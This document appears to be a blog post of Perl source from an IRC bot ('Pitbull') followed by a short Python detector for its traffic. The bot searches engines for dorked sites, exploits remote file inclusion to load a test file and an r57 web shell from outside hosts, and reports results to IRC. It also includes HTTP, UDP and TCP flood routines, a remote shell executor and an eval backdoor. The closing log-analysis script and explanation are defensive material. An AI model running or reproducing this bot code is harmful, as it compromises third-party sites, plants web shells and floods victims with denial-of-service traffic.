        # ______   __              ___    _   __    ___          __   __                                                       #
        #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
        # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
        #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
        #                                                                                                                      #
        ########################################################################################################################
        ######################
        #    MULTI SCANNER   #
        #                    #
        ######################
        if ($funcarg =~ /^multiscan\s+(.*?)\s+(.*)/){
        if (my $pid = fork) {
          waitpid($pid, 0);
          } else {
          if (fork) {
            exit;
            } else {
            my $bug=$1;
            my $dork=$2;
            my $contatore=0;
            my ($type,$space);
            my %hosts;
            ### Start Message
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Starting Scan for 4$bug 12$dork");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Initializing on 45 12Search Engines ");
            ### End of Start Message
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:12G4o8o12g9l4e12:.4|412 Started4");
            my @glist=&google($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:2Altavista:.4|412 Started4");
            my @alist=&altavista($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:7All7The7Web:.4|412 Started4");
            my @allist=&alltheweb($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:14A4S14K:.4|412 Started4");
            my @asklist=&ask($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:7AOL:.4|412 Started4");
            my @aollist=&aol($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Results for $dork");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 12G4o8o12g9l4e4 ".scalar(@glist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 2Altavista4 ".scalar(@alist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7All7The7Web4 ".scalar(@allist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 14A4S14K4 ".scalar(@asklist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7AOL ".scalar(@aollist)." 12Sites");
            push(my @tot, @glist, @ylist, @alist, @allist, @asklist, @aollist);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Total Results4 ".scalar(@tot)." 12Sites");
            my @puliti=&unici(@tot);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting Started For ".scalar(@puliti)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting");
            my $uni=scalar(@puliti);
            foreach my $sito (@puliti)
            {
              $contatore++;
              if ($contatore %30==0){
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting4 ".$contatore." 12of4 ".$uni. " 12Sites");
            }
            if ($contatore==$uni-1){
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4| Finished for $bug $dork");
          }
          ### Print CMD and TEST CMD d0nt change the TEST cmd !........###
          my $test="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
          my $print="http://".$sito.$bug."http://www.thiaguinho.net/Scanr0x/r57.txt"."?";
          ### End of Print CMD and TEST CMD d0nt change the TEST cmd !.###
          my $req=HTTP::Request->new(GET=>$test);
          my $ua=LWP::UserAgent->new();
          $ua->timeout(5);
          my $response=$ua->request($req);
          if ($response->is_success) {
            my $re=$response->content;
            if($re =~ /31337/ && $re =~ /uid=/){
            my $hs=geths($print); $hosts{$hs}++;
            if($hosts{$hs}=="1"){
            $x=os($test);
            ($type,$space)=split(/\,/,$x);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 4OFF12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print ");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
            my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
            my $reqz=HTTP::Request->new(GET=>$test2);
            my $ua=LWP::UserAgent->new();
            my $response=$ua->request($reqz);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
            }}
            elsif($re =~ /31337/)
            {
              my $hs=geths($print); $hosts{$hs}++;
              if($hosts{$hs}=="1"){
              $x=os($test);
              ($type,$space)=split(/\,/,$x);
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 3ON12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print  ");
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
              my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
              my $reqz=HTTP::Request->new(GET=>$test2);
              my $ua=LWP::UserAgent->new();
              my $response=$ua->request($reqz);
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
              }}
              }}}
              exit;
              }}}
              ######################
              #End of MultiSCANNER #
              #                    #
              ######################
              ########################################################################################################################
              # ______   __              ___    _   __    ___          __   __                                                       #
              #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
              # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
              #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
              #                                                                                                                      #
              ########################################################################################################################
              ######################
              #    GOOGLESCANNER   #
              #                    #
              ######################
              if ($funcarg =~ /^googlescan\s+(.*?)\s+(.*)/){
              if (my $pid = fork) {
                    waitpid($pid, 0);
                    } else {
                      if (fork) {
                        exit;
                        } else {
                          my $bug=$1;
                          my $dork=$2;
                          my $contatore=0;
                          my ($type,$space);
                          my %hosts;
                              ### Start Message
                              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Starting 12G4o8o12g9l4e12Scan for 4$bug 12$dork");
                              ### End of Start Message       
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:12G4o8o12g9l4e12:.4|412 Started4");
                              my @glist=&google($dork);
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Results for $dork");
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 12G4o8o12g9l4e4 ".scalar(@glist)." 12Sites");
                              push(my @tot, @glist);
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Filtering Cleaned results of 4 ".scalar(@tot)." 12Sites");
                              my @puliti=&unici(@tot);
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Cleaned Results ".scalar(@puliti)." 12Sites");   
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting Started");
                              my $uni=scalar(@puliti);
                              foreach my $sito (@puliti)
                              {
                              $contatore++;
                              if ($contatore %30==0){
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting4 ".$contatore." 12of4 ".$uni. " 12Sites");
                              }
                              if ($contatore==$uni-1){
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4| Finished for $bug $dork");
                          }
                              ### Print CMD and TEST CMD d0nt change the TEST cmd !........###
                              my $test="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
                              my $print="http://".$sito.$bug."http://www.thiaguinho.net/Scanr0x/r57.txt"."?";
                              ### End of Print CMD and TEST CMD d0nt change the TEST cmd !.###
                          my $req=HTTP::Request->new(GET=>$test);
                          my $ua=LWP::UserAgent->new();
                              $ua->timeout(5);
                              my $response=$ua->request($req);
                              if ($response->is_success) {
                                my $re=$response->content;
                                if($re =~ /31337/ && $re =~ /uid=/){
                                my $hs=geths($print); $hosts{$hs}++;
                                if($hosts{$hs}=="1"){
                                $x=os($test);
                                ($type,$space)=split(/\,/,$x);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 4OFF12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print ");
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
                                my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
                                my $reqz=HTTP::Request->new(GET=>$test2);
                                my $ua=LWP::UserAgent->new();
                                my $response=$ua->request($reqz);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
                                }}
                                elsif($re =~ /31337/)
                                {
                                my $hs=geths($print); $hosts{$hs}++;
                                if($hosts{$hs}=="1"){
                                $x=os($test);
                                ($type,$space)=split(/\,/,$x);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 3ON12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print  ");
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
                                my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
                                my $reqz=HTTP::Request->new(GET=>$test2);
                                my $ua=LWP::UserAgent->new();
                                my $response=$ua->request($reqz);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
                        }}
                        }}}
                        exit;
                        }}   
                        ######################
                        #End of GOOGLESCANNER#
                        #                    #
                        ######################
                        ########################################################################################################################
                        # ______   __              ___    _   __    ___          __   __                                                       #
                        #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
                        # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
                        #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
                        #                                                                                                                      #
                        ########################################################################################################################
                        ######################
                        #     HTTPFlood      #
                        #                    #
                        ######################
                        if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
                          my $itime = time;
                          my ($cur_time);
                          $cur_time = time - $itime;
                          while ($2>$cur_time){
                          $cur_time = time - $itime;
                          my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
                          print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
                          close($socket);
                        }
                        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking done 4 ".$1.".");
                      }
                      ######################
                      #  End of HTTPFlood  #
                      #                    #
                      ######################
                      ########################################################################################################################
                      # ______   __              ___    _   __    ___          __   __                                                       #
                      #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
                      # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
                      #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
                      #                                                                                                                      #
                      ########################################################################################################################
                      ######################
                      #     UDPFlood       #
                      #                    #
                      ######################
                      if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
                        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds.");
                        my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
                        $dtime = 1 if $dtime == 0;
                        my %bytes;
                        $bytes{igmp} = $2 * $pacotes{igmp};
                        $bytes{icmp} = $2 * $pacotes{icmp};
                        $bytes{o} = $2 * $pacotes{o};
                        $bytes{udp} = $2 * $pacotes{udp};
                        $bytes{tcp} = $2 * $pacotes{tcp};
                        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
                      }
                      exit;
                    }
                  }
                  ######################
                  #  End of Udpflood   #
                  #                    #
                  ######################


                  sub ircase {
                    my ($kem, $printl, $case) = @_;
                    if ($case =~ /^join (.*)/) {
                      j("$1");
                    }
                    if ($case =~ /^part (.*)/) {
                      p("$1");
                    }
                    if ($case =~ /^rejoin\s+(.*)/) {
                      my $chan = $1;
                      if ($chan =~ /^(\d+) (.*)/) {
                        for (my $ca = 1; $ca <= $1; $ca++ ) {
                          p("$2");
                          j("$2");
                        }
                      }
                      else {
                        p("$chan");
                        j("$chan");
                      }
                    }

                    if ($case =~ /^op/) {
                      op("$printl", "$kem") if $case eq "op";
                      my $oarg = substr($case, 3);
                      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
                    }

                    if ($case =~ /^deop/) {
                      deop("$printl", "$kem") if $case eq "deop";
                      my $oarg = substr($case, 5);
                      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
                    }

                    if ($case =~ /^msg\s+(\S+) (.*)/) {
                      msg("$1", "$2");
                    }

                    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
                      for (my $cf = 1; $cf <= $1; $cf++) {
                        msg("$2", "$3");
                      }
                    }

                    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
                      ctcp("$1", "$2");
                    }

                    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
                      for (my $cf = 1; $cf <= $1; $cf++) {
                        ctcp("$2", "$3");
                      }
                    }

                    if ($case =~ /^nick (.*)/) {
                      nick("$1");
                    }

                    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
                      conectar("$2", "$1", 6667);
                    }

                    if ($case =~ /^raw (.*)/) {
                      sendraw("$1");
                    }

                    if ($case =~ /^eval (.*)/) {
                      eval "$1";
                    }
                  }


                  sub shell {
                    my $printl=$_[0];
                    my $comando=$_[1];
                    if ($comando =~ /cd (.*)/) {
                      chdir("$1") || msg("$printl", "No such file or directory");
                      return;
                    }

                    elsif ($pid = fork) {
                      waitpid($pid, 0);
                    }
                    else {
                      if (fork) {
                        exit;

                        } else {
                        my @resp=`$comando 2>&1 3>&1`;
                        my $c=0;
                        foreach my $linha (@resp) {
                          $c++;
                          chop $linha;
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
                          if ($c == "$linas_max") {
                            $c=0;
                            sleep $sleep;
                          }
                        }
                        exit;
                      }
                    }
                  }

                  sub tcpflooder {
                    my $itime = time;
                    my ($cur_time);
                    my ($ia,$pa,$proto,$j,$l,$t);
                    $ia=inet_aton($_[0]);
                    $pa=sockaddr_in($_[1],$ia);
                    $ftime=$_[2];
                    $proto=getprotobyname('tcp');
                    $j=0;$l=0;
                    $cur_time = time - $itime;
                    while ($l<1000){
                    $cur_time = time - $itime;
                    last if $cur_time >= $ftime;
                    $t="SOCK$l";
                    socket($t,PF_INET,SOCK_STREAM,$proto);
                    connect($t,$pa)||$j--;
                    $j++;$l++;
                  }
                  $l=0;
                  while ($l<1000){
                  $cur_time = time - $itime;
                  last if $cur_time >= $ftime;
                  $t="SOCK$l";
                  shutdown($t,2);
                  $l++;
                }
              }



              sub udpflooder {
                my $iaddr = inet_aton($_[0]);
                my $msg = 'A' x $_[1];
                my $ftime = $_[2];
                my $cp = 0;
                my (%pacotes);
                $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
                socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
                socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
                socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
                socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
                return(undef) if $cp == 4;
                my $itime = time;
                my ($cur_time);
                while ( 1 ) {
                  for (my $porta = 1;
                  $porta <= 65000; $porta++) {
                    $cur_time = time - $itime;
                    last if $cur_time >= $ftime;
                    send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
                    send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
                    send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
                    send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;


                    for (my $pc = 3;
                    $pc <= 255;$pc++) {
                      next if $pc == 6;
                      $cur_time = time - $itime;
                      last if $cur_time >= $ftime;
                      socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
                      send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
                    }
                  }
                  last if $cur_time >= $ftime;
                }
                return($cur_time, %pacotes);
              }

              sub ctcp {
                return unless $#_ == 1;
                sendraw("PRIVMSG $_[0] :\001$_[1]\001");
              }

              sub msg {
                return unless $#_ == 1;
                sendraw("PRIVMSG $_[0] :$_[1]");
              }

              sub notice {
                return unless $#_ == 1;
                sendraw("NOTICE $_[0] :$_[1]");
              }

              sub op {
                return unless $#_ == 1;
                sendraw("MODE $_[0] +o $_[1]");
              }

              sub deop {
                return unless $#_ == 1;
                sendraw("MODE $_[0] -o $_[1]");
              }

              sub j {
                &join(@_);
              }

              sub join {
                return unless $#_ == 0;
                sendraw("JOIN $_[0]");

              }
              sub p { part(@_);
              }

              sub part {
                sendraw("PART $_[0]");
              }

              sub nick {
                return unless $#_ == 0;
                sendraw("NICK $_[0]");
              }

              sub quit {
                sendraw("QUIT :$_[0]");
              }

              sub fetch(){
              my $rnd=(int(rand(9999)));
              my $n= 80;
              if ($rnd<5000) { $n<<=1;}
                my $s= (int(rand(10)) * $n);
                {
                  my @dominios = ("removed-them-all");
                  my @str;
                  foreach $dom  (@dominios)
                  {
                    push (@str,"@gstring");
                  }
                  my $query="www.google.com/search?q=";
                  $query.=$str[(rand(scalar(@str)))];
                  $query.="&num=$n&start=$s";
                  my @lst=();
                  sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
                  my $page = http_query($query);
                  while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
                  if ($1 !~ m/google|cache|translate/){
                  push (@lst,$1);
                }
              }
              return (@lst);
            }

            sub os(){
            my $sito=$_[0];
            my $Res=query($sito);
            my $type;
            my $free;
            my $str;
            while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
            $type=$1;
          }
          while($Res=~m/<br>Free:(.+?)\<br>/g){
          $free=$1;
        }
        $str=$type.",".$free;
        return $str;
      }

      sub aol(){
      my @lst;
      my $key = $_[0];
      for($b=1;$b<=100;$b++){
      my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
      my $Res=query($AoL);
      while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
      my $k=$1;
      my @grep=links($k);
      push(@lst,@grep);
      }}
      return @lst;
    }

    sub google(){
    my @lst;
    my $key = $_[0];
    for($b=0;$b<=100;$b+=100){
    my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
    my $Res=query($Go);
    while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
    if ($1 !~ /google/){
    my $k=$1;
    my @grep=links($k);
    push(@lst,@grep);
    }}}
    return @lst;
  }

  sub altavista(){
  my @lst;
  my $key = $_[0];
  for($b=1;$b<=1000;$b+=10){
  my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  my $Res=query($AlT);
  while($Res=~m/<span class=ngrn>(.+?)\//g){
  if($1 !~ /altavista/){
  my $k=$1;
  $k=~s/<//g;
  $k=~s/ //g;
  my @grep=links($k);
  push(@lst,@grep);
  }}}
  return @lst;
}

sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
  my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
  my $Res=query($Ask);
  while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
  my $k=$3;
  $k=~s/[\"\ ]//g;
  my @grep=links($k);
  push(@lst,@grep);
  }}
  return @lst;
}

sub alltheweb()
{
  my @lst;
  my $key=$_[0];
  my $i=0;
  my $pg=0;
  for($i=0; $i<=1000; $i+=100)
  {
    my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
    my $Res=query($all);
    while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
    my $k=$1;
    $k=~s/ //g;
    my @grep=links($k);
    push(@lst,@grep);
    }}
    return @lst;
  }

  sub links()
  {
    my @l;
    my $link=$_[0];
    my $host=$_[0];
    my $hdir=$_[0];
    $hdir=~s/(.*)\/[^\/]*$/\1/;
    $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host.="/";
    $link.="/";
    $hdir.="/";
    $host=~s/\/\//\//g;
    $hdir=~s/\/\//\//g;
    $link=~s/\/\//\//g;
    push(@l,$link,$host,$hdir);
    return @l;
  }

  sub geths(){
  my $host=$_[0];
  $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}

sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}  
return @unici;
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
  alarm 10;
  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  my @r = <$sock>;
  $page="@r";
  alarm 0;
  close($sock);
  };
  return $page;
}
}

########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
############################################################################
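The scanner above builds each probe as `http://<site><bug>http://<remote host>/test.txt?`, tries it against the three base paths that `links()` derives per search hit, and sends it with `LWP::UserAgent`, whose default agent string begins with `libwww-perl`. The following detector for that request shape is an added example, not part of the original post or of the bot; it assumes combined-format access logs, and the sample log lines, hosts, addresses and the `min_paths` threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/nginx "combined" access-log line (the log format is an assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
# A query-parameter value that is itself an absolute remote URL.
REMOTE = re.compile(r'^(?:https?|ftp)://[^/?#]+', re.I)

# Constructed sample input: documentation IP ranges and example.* hosts only.
SAMPLE_LOG = [
    '198.51.100.23 - - [18/Apr/2010:10:02:11 +0900] "GET /index.php?page=http://files.example.net/test.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [18/Apr/2010:10:02:12 +0900] "GET /blog/index.php?page=http://files.example.net/test.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [18/Apr/2010:10:02:12 +0900] "GET /blog/2010/index.php?page=http%3A%2F%2Ffiles.example.net%2Ftest.txt%3F HTTP/1.1" 404 209 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [18/Apr/2010:10:05:40 +0900] "GET /out.php?url=http://www.example.org/docs HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [18/Apr/2010:10:06:01 +0900] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    'not a log line',
]


def decode(value, rounds=2):
    """Undo up to two layers of percent-encoding before matching."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def remote_params(target):
    """Return [(param, value)] for query parameters whose value is a remote URL."""
    _path, sep, query = target.partition("?")
    hits = []
    if not sep:
        return hits
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = decode(raw)
        if REMOTE.match(value):
            hits.append((name, value))
    return hits


def classify(value, ua):
    """'probe' when the request also carries a trait of this scanner, else 'review'."""
    reasons = ["remote-url-param"]
    if value.endswith("?"):                    # trailing "?" as built in $test / $print
        reasons.append("trailing-question-mark")
    if ua.lower().startswith("libwww-perl"):   # LWP::UserAgent default agent
        reasons.append("libwww-perl-agent")
    return ("probe" if len(reasons) > 1 else "review"), reasons


def scan(lines, min_paths=2):
    """Return (findings, sweeps); a sweep is one client trying one payload on several paths."""
    findings = []
    paths = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                           # skip lines that are not in the expected format
        target, ua = m.group("target"), m.group("ua") or ""
        path = target.partition("?")[0]
        for name, value in remote_params(target):
            severity, reasons = classify(value, ua)
            findings.append({
                "ip": m.group("ip"), "path": path, "param": name, "payload": value,
                "status": int(m.group("status")), "severity": severity, "reasons": reasons,
            })
            paths[(m.group("ip"), value)].add(path)
    sweeps = sorted((ip, payload, len(p))
                    for (ip, payload), p in paths.items() if len(p) >= min_paths)
    return findings, sweeps


if __name__ == "__main__":
    found, swept = scan(SAMPLE_LOG)
    for f in found:
        print(f["severity"], f["ip"], f["status"], f["path"], f["param"], f["payload"])
    for ip, payload, n in swept:
        print("sweep", ip, payload, "paths:", n)
```

A 200 status on a flagged request does not by itself show that the include worked, because the bot decides success from the response body (the `31337` and `uid=` markers), so flagged requests answered with 200 are the ones to examine first.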

Posted by applicationlayer